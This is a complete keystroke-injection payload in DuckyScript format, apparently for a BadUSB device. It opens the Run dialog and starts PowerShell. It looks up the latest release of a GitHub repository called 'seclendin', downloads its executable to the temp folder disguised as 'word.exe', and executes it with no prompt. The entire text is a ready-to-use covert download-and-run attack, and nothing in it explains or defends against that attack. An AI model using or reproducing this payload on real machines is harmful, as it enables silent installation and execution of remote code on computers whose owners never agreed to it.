GUI r
DELAY 500
STRING powershell
ENTER
DELAY 500
STRING $TagAPIUrl = "https://api.github.com/repos/skylab-kulubu/seclendin/tags";
STRING $Response = Invoke-RestMethod -Uri $TagAPIUrl -Method Get;
STRING $LatestTag = $response[0].name;
STRING $TempPath = [System.IO.Path]::GetTempPath();
STRING $FilePath = "$TempPath\word.exe";
STRING $Uri = "https://github.com/skylab-kulubu/seclendin/releases/download/$LatestTag/seclendin.exe";
STRING iwr -Uri $Uri -OutFile $FilePath;
STRING iex $FilePath
ENTER
